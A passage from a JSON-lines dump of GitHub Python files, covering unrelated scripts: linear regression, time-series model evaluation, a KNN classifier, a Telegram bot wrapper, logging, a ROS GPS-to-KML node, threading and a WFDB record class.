# Checking the shape of x, y and self.theta\n if (x.shape[1] != 1) \\\n or (y.shape[1] != 1) \\\n or (x.shape[0] != y.shape[0]) \\\n or (self.thetas.shape[0] != x.shape[1] + 1):\n return None\n # Performing the gradient descent\n for _ in range(self.max_iter):\n grad = self._gradient_(x, y)\n self.thetas = self.thetas - self.alpha * grad\n except:\n # If something unexpected happened, we juste leave\n return None\n\n @staticmethod\n def loss_elem_(y, y_hat):\n \"\"\"\n Description:\n Calculates all the elements (y_pred - y)^2 of the loss function.\n Args:\n y: has to be an numpy.array, a vector.\n y_hat: has to be an numpy.array, a vector.\n Returns:\n J_elem: numpy.array, a vector of dimension\n (number of the training examples,1).\n None if there is a dimension matching problem between y and y_hat.\n None if y or y_hat is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n res = (y - y_hat) ** 2\n return res\n except:\n None\n\n @staticmethod\n def loss_(y, y_hat):\n \"\"\"Computes the half mean squared error of two non-empty numpy.array,\n without any for loop. 
The two arrays must have the same dimensions.\n Args:\n y: has to be an numpy.array, a vector.\n y_hat: has to be an numpy.array, a vector.\n Returns:\n The half mean squared error of the two vectors as a float.\n None if y or y_hat are empty numpy.array.\n None if y and y_hat does not share the same dimensions.\n None if y or y_hat is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n loss = MyLinearRegression.CLS_loss_fct(y, y_hat)\n # loss = (y - y_hat).T @ (y - y_hat) / (2.0 * y.shape[0])\n return float(loss) / 2.0\n except:\n None\n\n def predict_(self, x):\n \"\"\"Computes the vector of prediction y_hat from two non-empty\n numpy.array.\n Args:\n x: has to be an numpy.array, a vector of shape m * 1.\n theta: has to be an numpy.array, a vector of shape 2 * 1.\n Returns:\n y_hat as a numpy.array, a vector of shape m * 1.\n None if x or theta are empty numpy.array.\n None if x or theta shapes are not appropriate.\n None if x or theta is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n if not isinstance(x, (np.ndarray)):\n return None\n if x.ndim == 1:\n x = x.reshape(-1, 1)\n if any([n == 0 for n in x.shape]):\n return None\n if self.thetas.shape != (x.shape[1] + 1, 1):\n return None\n xp = np.hstack((np.ones((x.shape[0], 1)), x))\n ypred = xp @ self.thetas\n return ypred\n except:\n return None\n","repo_name":"madvid/ml_module_01","sub_path":"ex03/my_linear_regression.py","file_name":"my_linear_regression.py","file_ext":"py","file_size_in_byte":9927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70445545973","text":"\"\"\"Task4\r\n\r\nScript allowing to calculate and save to file\r\na table with the average MAE calculated for\r\nTimeSeriesSplit which allow to quantify model fitness\r\n\"\"\"\r\nimport warnings\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import TimeSeriesSplit\r\nfrom utils import parse_args, load_data\r\nfrom statsmodels.tsa.ar_model import AutoReg\r\nfrom statsmodels.tsa.arima.model import ARIMA\r\nfrom statsmodels.tsa.api import VAR\r\nfrom sklearn.metrics import mean_absolute_error\r\n\r\n\r\ndef main():\r\n \"\"\"Call all of the functions\"\"\"\r\n _, data = load_data()\r\n args = parse_args()\r\n make_table(data, [\"Ukraine\", \"Poland\"], save=args.display)\r\n\r\n\r\ndef make_table(data: pd.DataFrame, countries: list, save: bool):\r\n \"\"\"Function used to calculate MAE for 3 models and 2 countries\r\n\r\n :param data: Temperature data\r\n :type data: pd.DataFrame\r\n :param countries: List of countries for which\r\n the MAE should be calculated\r\n :type countries: list\r\n :param save: Whether to save or display the table\r\n :type save: bool\r\n \"\"\"\r\n # Get the country data\r\n country1_data = data[data.Country == countries[0]].reset_index()\r\n country2_data = data[data.Country == countries[1]].reset_index()\r\n\r\n # Create the split\r\n tscv = TimeSeriesSplit(n_splits=10)\r\n MAE_list = [[] for i in range(6)]\r\n\r\n for train_index, test_index in tscv.split(country1_data):\r\n y_train_1, y_test_1 = (\r\n country1_data.AverageTemperatureCelsius[train_index],\r\n country1_data.AverageTemperatureCelsius[test_index],\r\n )\r\n y_train_2, y_test_2 = (\r\n country2_data.AverageTemperatureCelsius[train_index],\r\n country2_data.AverageTemperatureCelsius[test_index],\r\n )\r\n years_train, _ = 
country1_data.year[train_index], country1_data.year[test_index]\r\n\r\n # Create the lists of used models\r\n models_1 = [\r\n AutoReg(y_train_1, lags=10),\r\n ARIMA(y_train_1, order=(0, 2, 3)),\r\n VAR(pd.concat([y_train_1, years_train], axis=1)),\r\n ]\r\n models_2 = [\r\n AutoReg(y_train_2, lags=10),\r\n ARIMA(y_train_2, order=(0, 2, 3)),\r\n VAR(pd.concat([y_train_2, years_train], axis=1)),\r\n ]\r\n\r\n # Calculate MAE for each model and each split\r\n for index, model in enumerate(models_1):\r\n if index < 2:\r\n model_fitted = model.fit()\r\n predicted = model_fitted.predict(test_index[0], test_index[-1])\r\n else:\r\n model_fitted = model.fit(4)\r\n predicted = model_fitted.forecast(\r\n model_fitted.endog, steps=len(y_test_1)\r\n )[:, 0]\r\n MAE = mean_absolute_error(y_test_1, predicted)\r\n MAE_list[index].append(MAE)\r\n\r\n for index, model in enumerate(models_2):\r\n if index < 2:\r\n model_fitted = model.fit()\r\n predicted = model_fitted.predict(test_index[0], test_index[-1])\r\n else:\r\n model_fitted = model.fit(4)\r\n predicted = model_fitted.forecast(\r\n model_fitted.endog, steps=len(y_test_2)\r\n )[:, 0]\r\n MAE = mean_absolute_error(y_test_2, predicted)\r\n MAE_list[index + 3].append(MAE)\r\n\r\n # Calculate the MAE mean and show it as a table\r\n MAE_mean = [np.mean(i) for i in MAE_list]\r\n MAE_tab = np.array(MAE_mean).reshape(2, 3)\r\n MAE_tab = pd.DataFrame(\r\n MAE_tab, columns=[\"AR\", \"ARIMA\", \"VAR\"], index=[countries[0], countries[1]]\r\n )\r\n\r\n # Save or display the table\r\n if save:\r\n print(\"Saving table to data folder\")\r\n MAE_tab.to_csv(\"../data/task4_table.csv\")\r\n else:\r\n print(MAE_tab)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"zofiakk/DAV","sub_path":"lab9/scripts/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29940698386","text":"'''\r\nQuestion:\r\nComplete the square sum function so that it squares each \r\nnumber passed into it and then sums the results together.\r\n\r\nFor example, for [1, 2, 2] it should return 9 \r\nbecause 1^2 + 2^2 + 2^2 = 9.\r\n\r\nAuthor : Carlos Raniel Arro\r\n\r\n'''\r\n\r\n# numbers to be pass\r\n\r\nnum = [1, 2, 2]\r\nsum = 0\r\n\r\n\r\ndef CompleteSquareSum():\r\n x = 0\r\n for i in num:\r\n y = i ** 2\r\n x += y\r\n i += 1\r\n print(x)\r\n\r\n\r\nCompleteSquareSum()\r\n","repo_name":"CarlosArro2001/CodeWarsProblems","sub_path":"squareNsum.py","file_name":"squareNsum.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75245713333","text":"import numpy as np\nimport math\nfrom sklearn.metrics import precision_score,recall_score,f1_score\n\nclass KNN():\n def __init__(self,n_neighbours=5, representatives=False, project=False):\n self.n_neighbours = n_neighbours\n self.representatives = representatives\n self.project = project\n pass\n\n def fit(self, X_train, Y_train):\n if self.representatives:\n self.X_train, self.Y_train = create_representatives(X_train,Y_train)\n else:\n self.X_train = X_train\n self.Y_train = Y_train\n if self.project:\n self.project = True\n self.X_train = self.project_datapoints(X_train)\n \n @staticmethod\n def project_datapoints(X):\n return np.mean(X,axis=2)\n\n def predict_datapoint(self, datapoint):\n class_distances = np.empty((0, 2)) # class labels and distances to the datapoint to other datapoints in X_train\n 
for x, y in zip(self.X_train, self.Y_train):\n dist = self.distance(datapoint, x)\n class_distances = np.append(class_distances, np.array([[y, dist]]), axis=0)\n \n class_distances = class_distances[class_distances[:, 1].argsort()]\n n_classes = class_distances[:self.n_neighbours, 0]\n\n _, counts = np.unique(n_classes, return_counts=True) # find the most common class\n ind = np.argmax(counts)\n return int(n_classes[ind])\n \n def predict_datapoint_for_n_in_range(self, datapoint, n_range):\n class_distances = np.empty((0, 2)) # class labels and distances to the datapoint to other datapoints in X_train\n for x, y in zip(self.X_train, self.Y_train):\n dist = self.distance(datapoint, x)\n class_distances = np.append(class_distances, np.array([[y, dist]]), axis=0)\n \n class_distances = class_distances[class_distances[:, 1].argsort()]\n predictions = np.empty((n_range),dtype=int)\n for i in range(n_range):\n n_classes = class_distances[:i+1, 0]\n _, counts = np.unique(n_classes, return_counts=True) # find the most common class\n ind = np.argmax(counts)\n predictions[i]=int(n_classes[ind])\n return predictions\n\n @staticmethod\n def distance(datapoint1, datapoint2): # euclidian distance\n flattened1 = np.ravel(datapoint1)\n flattened2 = np.ravel(datapoint2)\n return np.linalg.norm(flattened1 - flattened2)\n \n def predict(self,X):\n predicted = np.empty(len(X),dtype=int)\n for i in range(len(X)):\n predicted[i]=self.predict_datapoint(X[i])\n return predicted\n \n def predict_for_n_in_range(self,X,n_range): #\n predicted = np.empty([len(X),n_range],dtype=int)\n for i in range(len(X)):\n predicted[i]=self.predict_datapoint_for_n_in_range(X[i],n_range)\n return predicted\n \n def score(self,X,y):\n if self.project:\n X = self.project_datapoints(X)\n correct = 0\n # number of classes\n confusion_matrix = np.zeros([10,10],dtype=int)\n metrics= np.zeros((3),dtype=float)\n #accuracy\n predicted_lables = self.predict(X)\n for predicted,actual in zip(predicted_lables,y):\n if predicted==actual:\n correct+=1\n confusion_matrix[actual][predicted]+=1\n\n metrics[0] = precision_score(y,predicted_lables,average=\"macro\")\n metrics[1] = recall_score(y,predicted_lables,average=\"macro\")\n metrics[2] = f1_score(y,predicted_lables,average=\"macro\")\n return correct/len(y), confusion_matrix,metrics\n \n def score_for_n_in_range(self,X,y,n_range):\n if self.project:\n X = self.project_datapoints(X)\n score = np.zeros(n_range,dtype=np.float32)\n \n # creates empty cm with fixed 10 number of classes\n confusion_matrix = np.zeros([n_range,10,10],dtype=int)\n\n #accuracy score\n i = 0 \n for predicted_column in self.predict_for_n_in_range(X,n_range).T:\n correct = 0\n for predicted, actual in zip(predicted_column,y):\n if predicted==actual:\n correct+=1\n confusion_matrix[i][actual][predicted]+=1 # the same way sklearn produces CM\n score[i]=correct/len(y)\n i+=1\n return score,confusion_matrix\n \n def cross_val_score(self,X,Y, n_folds=4):\n rest = len(X)%n_folds\n if rest!=0:\n print(f\"WARNING! Cannot divide given dataset equally into {n_folds} parts. 
def cross_val_score(self,X,Y, n_folds=4):\n rest = len(X)%n_folds\n if rest!=0:\n print(f\"WARNING! Cannot divide given dataset equally into {n_folds} parts. Ignoring last {rest} elements!\")\n X = X[:-rest]\n Y = Y[:-rest]\n X_sets = np.split(X,n_folds)\n Y_sets = np.split(Y,n_folds)\n\n # create new model, not to overwrite current fit\n model = KNN(self.n_neighbours, \n self.representatives, \n self.project)\n \n # accuracy\n scores = np.empty(n_folds,dtype=float)\n cm= np.empty([n_folds,10,10],dtype=int)\n metrics = np.zeros([n_folds,3],dtype=float)\n\n for i in range(n_folds):\n X_train = X_sets.copy()\n Y_train = Y_sets.copy()\n X_val = X_train.pop(i)\n Y_val = Y_train.pop(i)\n\n model.fit(np.concatenate(X_train),\n np.concatenate(Y_train))\n scores[i],cm[i],metrics[i] = model.score(X_val,Y_val)\n return scores,cm,metrics\n\ndef create_representatives(X,Y):\n n_classes = np.zeros(10,dtype=int) # per-class sample counts\n for y in Y:\n n_classes[y]+=1\n\n # sorts according to labels\n X_sorted = [x for _,x in sorted(zip(Y,X),key=lambda el : el[0])]\n \n index_x=0\n class_representants = []\n for n in n_classes:\n n_representatives = math.ceil(math.log2(n)) # eq. 1\n representatives = np.empty((n_representatives),dtype=type(X_sorted[0]))\n step = math.ceil(n/n_representatives) # eq. 2\n for i in range(n_representatives-1):\n representatives[i]=sum(X_sorted[index_x+i*step : index_x+(i+1)*step])//step\n representatives[n_representatives-1] = sum(X_sorted[index_x+(n_representatives-1)*step : index_x+n])//(n-(n_representatives-1)*step) # eq. 4\n index_x+=n\n for el in representatives:\n class_representants.append(el)\n return np.array(class_representants,dtype=int), np.concatenate([np.full(math.ceil(math.log2(n)),i,dtype=int) for i,n in enumerate(n_classes)])","repo_name":"AJaszcz/SSI-projekt","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38032871972","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\n\n\nclass Chat:\n\n def __init__(self, bot_token, start_callback, message_callback, logger):\n self.__bot_token = bot_token\n self.__start_callback = start_callback\n self.__message_callback = message_callback\n self.__logger = logger\n\n def start(self):\n updater = Updater(token=self.__bot_token, use_context=True)\n dispatcher = updater.dispatcher\n\n start_handler = CommandHandler('start', self.__get_tg_start_callback())\n message_handler = MessageHandler(Filters.text, self.__get_tg_message_callback())\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(message_handler)\n\n self.__logger.log('Bot started')\n\n updater.start_polling()\n\n def __get_tg_start_callback(self):\n def callback(update, context):\n chat_id = update.effective_chat.id\n response = self.__start_callback(chat_id)\n self.__logger.log(f'/start was triggered\\n{str(update.effective_chat)}\\nBot:\\n{response}')\n context.bot.send_message(chat_id=chat_id, text=response)\n\n return callback\n\n def __get_tg_message_callback(self):\n def callback(update, context):\n chat_id = update.effective_chat.id\n message = update.message.text\n\n response = self.__message_callback(chat_id, message)\n self.__logger.log(f'Chat {chat_id}:\\n{message}\\n\\nBot:\\n{response}')\n context.bot.send_message(chat_id=chat_id, text=response)\n\n return callback\n","repo_name":"resivalex/answer-correctly-to-go-further-telegram-bot","sub_path":"src/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70677913654","text":"#%%\n\"\"\"\n* Logging level allows us to specify exactly what we want to log by seperating them into categories\n\n* Categories = debug, info, warnming, error, critical\n* 1) DEBUG: Detailed information, typically of interest only when diagnosing problems.\n\n* 2) INFO: Confirmation that things are working as expected.\n\n* 3) WARNING: An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected.\n\n* 4) ERROR: Due to a more serious problem, the software has not been able to perform some function.\n\n* 5) CRITICAL: A serious error, indicating that the program itself may be unable to continue running.\n\n* The default level of logging is set to WARNING, hence anything above and equal to WARNING will be flagged which include WARNING, ERROR and CRITICAL\n\n\"\"\"\n\n#%%\nimport logging\nimport os\nimport pandas as pd\n\nos.chdir(r'C:\\Users\\tanzh\\OneDrive\\Git Folder\\python_reference_materials\\script-setup')\n# to ensure that we putting the log file in the correct location\n\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(filename='test.log', format='%(asctime)s : %(levelname)s : %(message)s') \n# this is will create the test file, date is in yyyy-mm-dd\n\ntry :\n data = pd.read_csv(r'C:\\Users\\tanzh\\Downloads\\diabetes121556.csv')\n new_data = data.head(15)\n new_data.to_csv('new_data.csv', index=False)\n print('Completed. Please check the output.')\n logging.info('Script ran sucessfully.')\n\nexcept FileNotFoundError:\n print('The file is not found.')\n logging.warning(f'The file is not found')\n logging.error(f'The file is not found')\n logging.critical(f'The file is not found')\n\n","repo_name":"harvey-tan91/python_reference_materials","sub_path":"script-setup/how_to_create_log_files.py","file_name":"how_to_create_log_files.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21168471280","text":"#!/usr/bin/env python\n\nfrom aocd import get_data, submit\nimport os\n\nfrom games import RockPaperScissors, part_two\n\ndef parseGames(gamesdata):\n games = []\n for game_data in gamesdata.split(\"\\n\"):\n games.append(RockPaperScissors(game_data))\n\n print(f\"Part one: {sum([game.score for game in games])}\")\n\n p2 = [part_two[game.user_plays][game.elf_plays] for game in games]\n print(p2)\n print(sum(p2))\n # submit(sum(p2))\n\n\n\ndef main(test=False):\n if test:\n raw_data = open(\"test.txt\").read()\n else:\n day = int(os.getcwd()[-2:])\n raw_data = get_data(day=day, year=2022)\n \n parseGames(raw_data)\n\nif __name__ == '__main__':\n main()","repo_name":"wmkuipers/aoc2022","sub_path":"day02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9504800665","text":"#!/usr/bin/env python\n\n#\n# Title: piksi_rtk_kml.py\n# Description: ROS node to write KML file from Piksi messages.\n#\n\nimport rospy\nimport roslib.packages\nimport time\nfrom datetime import datetime\nfrom piksi_rtk_msgs.msg import *\nfrom sensor_msgs.msg import NavSatFix\nfrom geometry_msgs.msg import PointStamped\n\n\nclass PiksiRtkKml:\n kRosPackageName = \"piksi_rtk_kml\"\n kAvailableKmlLayouts = [\"LineString\", \"Placemark\"]\n\n def __init__(self):\n rospy.init_node('piksi_rtk_kml')\n # 
Check requested KML layout\n self.kml_layout = str(rospy.get_param('~kml_layout', self.kAvailableKmlLayouts[0]))\n if not self.kml_layout in self.kAvailableKmlLayouts:\n error_msg = \"Requested KML layout %s is not available.\" % self.kml_layout\n rospy.logfatal(error_msg)\n rospy.signal_shutdown(error_msg)\n\n # KML file\n package_path = roslib.packages.get_pkg_dir(self.kRosPackageName)\n kml_file_name = datetime.utcfromtimestamp(rospy.get_time()).strftime('%Y-%m-%d-%H-%M-%S')\n self.kml_file_path = \"%s/kml/%s.kml\" % (package_path, kml_file_name)\n self.file_obj = open(self.kml_file_path, 'w')\n self.file_obj.write(self.kml_head(kml_file_name))\n\n # Settings.\n self.sampling_period = 1.0 / rospy.get_param('~sampling_frequency', 1.0)\n self.use_altitude_from_enu = rospy.get_param('~use_altitude_from_enu', False)\n self.extrude_point = rospy.get_param('~extrude_point', False)\n self.use_heading = rospy.get_param('~use_heading', True)\n self.placemarker_prefix_name = rospy.get_param('~placemarker_prefix_name', \"WP\")\n self.tessellate = rospy.get_param('~tessellate', 0)\n self.stick_points_to_ground = rospy.get_param('~stick_points_to_ground', False)\n self.kml_altitude_mode = rospy.get_param('~kml_altitude_mode', \"absolute\")\n\n if self.use_altitude_from_enu and self.kml_altitude_mode != \"relativeToGround\":\n rospy.logwarn(\"If you want to use altitude from enu_point_fix topic, \\\n it is recommended to set parameter kml_altitude_mode = 'relativeToGround'\")\n\n # Subscribe.\n rospy.Subscriber('piksi/navsatfix_rtk_fix', NavSatFix,\n self.navsatfix_rtk_fix_callback)\n rospy.Subscriber('piksi/baseline_heading', BaselineHeading,\n self.baseline_heading_callback)\n rospy.Subscriber('piksi/enu_point_fix', PointStamped,\n self.enu_point_callback)\n\n # Variables.\n self.waypoint_counter = 0\n self.heading_received = False\n self.last_heading = 0.0\n self.time_last_writing = rospy.get_time()\n self.last_enu_altitude = 0.0\n self.first_navsatfix_received = False\n\n rospy.on_shutdown(self.close_kml_file_handler)\n\n rospy.spin()\n\n def navsatfix_rtk_fix_callback(self, msg):\n\n if not self.first_navsatfix_received:\n if self.kml_layout == \"LineString\":\n self.file_obj.write(self.kml_linestring_preamble())\n self.first_navsatfix_received = True\n\n if rospy.get_time() >= (self.time_last_writing + self.sampling_period):\n\n self.waypoint_counter = self.waypoint_counter + 1\n waypoint_name = self.placemarker_prefix_name + str(self.waypoint_counter)\n utc_time = time.strftime(\"%Y-%m-%dT%H:%M:%SZ\", time.gmtime(msg.header.stamp.to_sec()))\n lat = msg.latitude\n lon = msg.longitude\n if self.use_altitude_from_enu:\n alt = self.last_enu_altitude\n else:\n alt = msg.altitude\n description = ''\n\n if self.heading_received:\n description = 'Receiver Baseline Heading: ' + str(self.last_heading / 1e3) + \" [deg].\"\n\n kml_string = \"\"\n if self.kml_layout == \"LineString\":\n kml_string = self.kml_linestring(lat, lon, alt)\n elif self.kml_layout == \"Placemark\":\n kml_string = self.kml_placemark(waypoint_name, utc_time, lat, lon, alt, description)\n\n self.file_obj.write(kml_string)\n\n self.time_last_writing = rospy.get_time()\n\n def baseline_heading_callback(self, msg):\n self.heading_received = True\n self.last_heading = msg.heading\n\n def enu_point_callback(self, msg):\n self.last_enu_altitude = msg.point.z\n\n def close_kml_file_handler(self):\n if self.kml_layout == \"LineString\":\n self.file_obj.write(self.kml_linestring_tail())\n self.file_obj.write(self.kml_tail())\n 
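# Added note: kml_tail() is expected to close the <Document> and <kml>\n # elements so the file on disk ends up as well-formed XML.\n 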
self.file_obj.close()\n rospy.loginfo(rospy.get_name() + ' KML file written in \\'%s\\'' % self.kml_file_path)\n\n # Adapted from: https://github.com/hitzg/bag_tools/blob/master/bag_to_kml.py\n def kml_head(self, name):\n return '''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<kml xmlns=\"http://www.opengis.net/kml/2.2\">\n<Document>\n <name>%s</name>\n''' % (name)\n\n # Adapted from: https://github.com/hitzg/bag_tools/blob/master/bag_to_kml.py\n def kml_tail(self):\n return '''</Document>\n</kml>\n'''\n\n def kml_placemark(self, name, timestamp, lat, lon, alt=0, description=''):\n return '''\n <Placemark>\n <name>%s</name>\n <TimeStamp>\n <when>%s</when>\n </TimeStamp>\n <Point>\n <extrude>%s</extrude>\n <altitudeMode>%s</altitudeMode>\n <coordinates>%f, %f, %f</coordinates>\n </Point>\n <description>%s</description>\n </Placemark>\n''' % (name, timestamp, self.extrude_point,\n self.kml_altitude_mode, lon, lat, alt, description) # KML wants first lon and then lat.\n\n def kml_linestring(self, lat, lon, alt=0):\n # do not put space between numbers and commas!\n return '''\n %f,%f,%f''' % (lon, lat, alt) # KML wants first lon and then lat.\n\n def kml_linestring_preamble(self):\n return '''\n <Placemark>\n <name>Absolute Extruded</name>\n <styleUrl>#yellowLineGreenPoly</styleUrl>\n <LineString>\n <extrude>%d</extrude>\n <tessellate>%d</tessellate>\n <altitudeMode>%s</altitudeMode>\n <coordinates>\n''' % (self.extrude_point, self.tessellate, self.kml_altitude_mode)\n\n def kml_linestring_tail(self):\n return '''\n </coordinates>\n </LineString>\n </Placemark>\n'''\n","repo_name":"ethz-asl/ethz_piksi_ros","sub_path":"piksi_rtk_kml/src/piksi_rtk_kml/piksi_rtk_kml.py","file_name":"piksi_rtk_kml.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"36799673923","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport threading\nimport time\nt_l = []\n\ns = threading.BoundedSemaphore(3) # cap the maximum number of concurrently running threads\n\ndef run(n):\n with s:\n print(\"running\")\n time.sleep(n)\n\n # s.release() # releasing a BoundedSemaphore more times than it was acquired raises an error\n\n\nif __name__ == \"__main__\":\n for n in range(10):\n t_l.append(threading.Thread(target=run, args=(n, )))\n\n for i in range(10):\n t_l[i].start()\n # a = False\n # def test():\n # assert a, \"not\"\n # print(\"okk\")\n #\n # test()","repo_name":"diaoyuqiang/python","sub_path":"threading_/threading_boundedsemaphore.py","file_name":"threading_boundedsemaphore.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35510055551","text":"import datetime\nimport multiprocessing\nimport posixpath\nimport re\n\nimport numpy as np\nimport os\nimport pandas as pd\nimport requests\n\nfrom . import _header\nfrom . import _signal\nfrom . import download\n\nimport pdb\n\n\nclass BaseRecord(object):\n # The base WFDB class extended by the Record and MultiRecord classes.\n def __init__(self, record_name=None, n_sig=None,\n fs=None, counter_freq=None, base_counter=None,\n sig_len=None, base_time=None, base_date=None,\n comments=None, sig_name=None):\n self.record_name = record_name\n self.n_sig = n_sig\n self.fs = fs\n self.counter_freq = counter_freq\n self.base_counter = base_counter\n self.sig_len = sig_len\n self.base_time = base_time\n self.base_date = base_date\n self.comments = comments\n self.sig_name = sig_name\n\n def check_field(self, field, required_channels='all'):\n \"\"\"\n Check whether a single field is valid in its basic form. Does\n not check compatibility with other fields.\n\n Parameters\n ----------\n field : str\n The field name\n required_channels : list, optional\n Used for signal specification fields. All channels are\n checked for their integrity if present, but channels that do\n not lie in this field may be None.\n\n Notes\n -----\n This function is called from wrheader to check fields before\n writing. 
It is also supposed to be usable at any point to\n check a specific field.\n\n \"\"\"\n item = getattr(self, field)\n if item is None:\n raise Exception('Missing field required: %s' % field)\n\n # We should have a list specifying these automatically.\n\n # Whether the item should be a list. Watch out for required_channels for `segments`\n expect_list = True if field in LIST_FIELDS else False\n\n # Check the type of the field (and of its elements if it should\n # be a list)\n _check_item_type(item, field_name=field,\n allowed_types=ALLOWED_TYPES[field],\n expect_list=expect_list,\n required_channels=required_channels)\n\n # Individual specific field checks\n\n if field in ['d_signal', 'p_signal']:\n check_np_array(item=item, field_name=field, ndim=2,\n parent_class=(lambda f: np.integer if f == 'd_signal' else np.floating)(field))\n elif field in ['e_d_signal', 'e_p_signal']:\n for ch in range(len(item)):\n check_np_array(item=item[ch], field_name=field,\n ndim=1, parent_class=(lambda f: np.integer if f == 'e_d_signal' else np.floating)(field),\n channel_num=ch)\n\n # Record specification fields\n\n elif field == 'record_name':\n # Allow letters, digits, hyphens, and underscores.\n accepted_string = re.match('[-\\w]+', self.record_name)\n if not accepted_string or accepted_string.string != self.record_name:\n raise ValueError('record_name must only comprise of letters, digits, hyphens, and underscores.')\n elif field == 'n_seg':\n if self.n_seg <= 0:\n raise ValueError('n_seg must be a positive integer')\n elif field == 'n_sig':\n if self.n_sig <= 0:\n raise ValueError('n_sig must be a positive integer')\n elif field == 'fs':\n if self.fs <= 0:\n raise ValueError('fs must be a positive number')\n elif field == 'counter_freq':\n if self.counter_freq <= 0:\n raise ValueError('counter_freq must be a positive number')\n elif field == 'base_counter':\n if self.base_counter <= 0:\n raise ValueError('base_counter must be a positive number')\n elif field == 'sig_len':\n if self.sig_len < 0:\n raise ValueError('sig_len must be a non-negative integer')\n\n # Signal specification fields\n elif field in _header.SIGNAL_SPECS.index:\n if required_channels == 'all':\n required_channels = range(len(item))\n\n for ch in range(len(item)):\n # If the element is allowed to be None\n if ch not in required_channels:\n if item[ch] is None:\n continue\n\n if field == 'file_name':\n # Check for file_name characters\n accepted_string = re.match('[-\\w]+\\.?[\\w]+', item[ch])\n if not accepted_string or accepted_string.string != item[ch]:\n raise ValueError('File names should only contain alphanumerics, hyphens, and an extension. eg. 
record-100.dat')\n # Check that dat files are grouped together\n if not is_monotonic(self.file_name):\n raise ValueError('Signals in a record that share a given file must be consecutive.')\n elif field == 'fmt':\n if item[ch] not in _signal.DAT_FMTS:\n raise ValueError('File formats must be valid WFDB dat formats:', _signal.DAT_FMTS)\n elif field == 'samps_per_frame':\n if item[ch] < 1:\n raise ValueError('samps_per_frame values must be positive integers')\n elif field == 'skew':\n if item[ch] < 0:\n raise ValueError('skew values must be non-negative integers')\n elif field == 'byte_offset':\n if item[ch] < 0:\n raise ValueError('byte_offset values must be non-negative integers')\n elif field == 'adc_gain':\n if item[ch] <= 0:\n raise ValueError('adc_gain values must be positive')\n elif field == 'baseline':\n # Original WFDB library 10.5.24 only has 4 bytes for\n # baseline.\n if item[ch] < -2147483648 or item[ch] > 2147483648:\n raise ValueError('baseline values must be between -2147483648 (-2^31) and 2147483647 (2^31 -1)')\n elif field == 'units':\n if re.search('\\s', item[ch]):\n raise ValueError('units strings may not contain whitespaces.')\n elif field == 'adc_res':\n if item[ch] < 0:\n raise ValueError('adc_res values must be non-negative integers')\n elif field == 'block_size':\n if item[ch] < 0:\n raise ValueError('block_size values must be non-negative integers')\n elif field == 'sig_name':\n if re.search('\\s', item[ch]):\n raise ValueError('sig_name strings may not contain whitespaces.')\n if len(set(item)) != len(item):\n raise ValueError('sig_name strings must be unique.')\n\n # Segment specification fields and comments\n elif field in _header.SEGMENT_SPECS.index:\n for ch in range(len(item)):\n if field == 'seg_name':\n # Segment names must be alphanumerics or just a\n # single '~'\n if item[ch] == '~':\n continue\n accepted_string = re.match('[-\\w]+', item[ch])\n if not accepted_string or accepted_string.string != item[ch]:\n raise ValueError(\"Non-null segment names may only contain alphanumerics and dashes. Null segment names must be set to '~'\")\n elif field == 'seg_len':\n # For records with more than 1 segment, the first\n # segment may be the layout specification segment\n # with a length of 0\n min_len = 0 if ch == 0 else 1\n if item[ch] < min_len:\n raise ValueError('seg_len values must be positive integers. Only seg_len[0] may be 0 to indicate a layout segment')\n # Comment field\n elif field == 'comments':\n if item[ch].startswith('#'):\n print(\"Note: comment strings do not need to begin with '#'. 
This library adds them automatically.\")\n if re.search('[\\t\\n\\r\\f\\v]', item[ch]):\n raise ValueError('comments may not contain tabs or newlines (they may contain spaces and underscores).')\n\n\n def check_read_inputs(self, sampfrom, sampto, channels, physical,\n smooth_frames, return_res):\n \"\"\"\n Ensure that input read parameters (from rdsamp) are valid for\n the record\n\n \"\"\"\n\n # Data Type Check\n if not hasattr(sampfrom, '__index__'):\n raise TypeError('sampfrom must be an integer')\n if not hasattr(sampto, '__index__'):\n raise TypeError('sampto must be an integer')\n if not isinstance(channels, list):\n raise TypeError('channels must be a list of integers')\n\n # Duration Ranges\n if sampfrom < 0:\n raise ValueError('sampfrom must be a non-negative integer')\n if sampfrom > self.sig_len:\n raise ValueError('sampfrom must be shorter than the signal length')\n if sampto < 0:\n raise ValueError('sampto must be a non-negative integer')\n if sampto > self.sig_len:\n raise ValueError('sampto must be shorter than the signal length')\n if sampto <= sampfrom:\n raise 